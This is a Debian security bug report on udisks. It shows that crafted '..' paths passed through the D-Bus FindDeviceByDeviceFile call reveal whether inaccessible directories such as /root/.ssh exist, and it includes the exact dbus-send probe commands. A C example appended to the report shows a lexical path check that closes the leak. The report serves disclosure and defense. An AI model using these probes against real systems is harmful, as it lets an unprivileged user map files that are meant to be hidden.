Package: udisks
Version: 1.0.1+git20100614-3
Severity: important
Tags: security

It seems that org.freedesktop.UDisks.FindDeviceByDeviceFile can be used to
discover whether a directory exists even if the user should not have any
access to it:

$ ls -ld /root/.ssh
ls: cannot access /root/.ssh: Permission denied
$ ls -ld /root/.foo
ls: cannot access /root/.foo: Permission denied
$ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.ssh/../../dev/sda1"
method return sender=:1.28 -> dest=:1.3755 reply_serial=2
   object path "/org/freedesktop/UDisks/devices/sda1"
$ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.foo/../../dev/sda1"
Error org.freedesktop.UDisks.Error.Failed: No such device

This bug was inspired by bug #697464.

-- System Information:
Debian Release: 6.0.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-0.bpo.2-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages udisks depends on:
ii  dbus                   1.2.24-4+squeeze1   simple interprocess messaging syst
ii  libatasmart4           0.17+git20100219-2  ATA S.M.A.R.T. reading and parsing
ii  libc6                  2.11.3-4            Embedded GNU C Library: Shared lib
ii  libdbus-1-3            1.2.24-4+squeeze1   simple interprocess messaging syst
ii  libdbus-glib-1-2       0.88-2.1            simple interprocess messaging syst
ii  libdevmapper1.02.1     2:1.02.48-5         The Linux Kernel Device Mapper use
ii  libglib2.0-0           2.24.2-1            The GLib library of C routines
ii  libgudev-1.0-0         164-3               GObject-based wrapper library for
ii  libparted0debian1      2.3-5               The GNU Parted disk partitioning s
ii  libpolkit-backend-1-0  0.96-4+squeeze2     PolicyKit backend API
ii  libpolkit-gobject-1-0  0.96-4+squeeze2     PolicyKit Authorization API
ii  libsgutils2-2          1.29-1              utilities for devices using the SC
ii  libudev0               164-3               libudev shared library
ii  udev                   164-3               /dev/ and hotplug management daemo

Versions of packages udisks recommends:
ii  dosfstools             3.0.9-1             utilities for making and checking
ii  hdparm                 9.32-1              tune hard disk parameters for high
pn  mtools                 <none>              (no description available)
pn  ntfs-3g                <none>              (no description available)
pn  ntfsprogs              <none>              (no description available)
ii  policykit-1            0.96-4+squeeze2     framework for managing administrat

Versions of packages udisks suggests:
ii  cryptsetup             2:1.1.3-4squeeze2   configures encrypted block devices
pn  mdadm                  <none>              (no description available)
pn  reiserfsprogs          <none>              (no description available)
pn  xfsprogs               <none>              (no description available)

-- no debconf information
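
Added example, not part of the original report and not udisks code: one way a privileged service can avoid this kind of existence oracle is to validate the caller's string lexically before any filesystem access. The function names, the /dev/-only policy and the sample paths other than the two from the report are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700            /* for realpath() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Leaky pattern: resolve the caller's string with the daemon's privileges.
 * Success depends on whether every intermediate directory exists, so the
 * reply tells the caller about directories it cannot read itself. */
static int naive_lookup(const char *path)
{
    char resolved[PATH_MAX];
    if (realpath(path, resolved) == NULL)
        return 0;                    /* reported as "No such device" */
    return strncmp(resolved, "/dev/", 5) == 0;
}

/* Hardened pattern: accept only strings that are lexically under /dev/ and
 * have no ".", ".." or empty components. Nothing on disk is consulted, so
 * the verdict cannot depend on directories outside the caller's reach. */
static int device_path_is_acceptable(const char *path)
{
    const char *p;
    if (strncmp(path, "/dev/", 5) != 0 || strlen(path) >= PATH_MAX)
        return 0;
    for (p = path + 5; ; p++) {
        size_t len = strcspn(p, "/");
        if (len == 0)                /* "/dev/", "//" or a trailing "/" */
            return 0;
        if (p[0] == '.' && (len == 1 || (len == 2 && p[1] == '.')))
            return 0;                /* "." or ".." component */
        p += len;
        if (*p == '\0')
            return 1;
    }
}

int main(void)
{
    /* First two strings are from the report; the rest are constructed. */
    const char *samples[] = { "/root/.ssh/../../dev/sda1",
                              "/root/.foo/../../dev/sda1", "/dev/sda1" };
    for (size_t i = 0; i < 3; i++)
        printf("%-28s acceptable=%d\n", samples[i],
               device_path_is_acceptable(samples[i]));
    printf("naive, parent exists:  %d\n", naive_lookup("/dev/../dev/null"));
    printf("naive, parent missing: %d\n",
           naive_lookup("/dev/constructed-missing-dir/../null"));
    return 0;
}
```

Both strings from the report are rejected with the same answer, so the reply no longer distinguishes an existing directory from a missing one. Symbolic links below /dev/ would still be followed by whatever lookup runs afterwards.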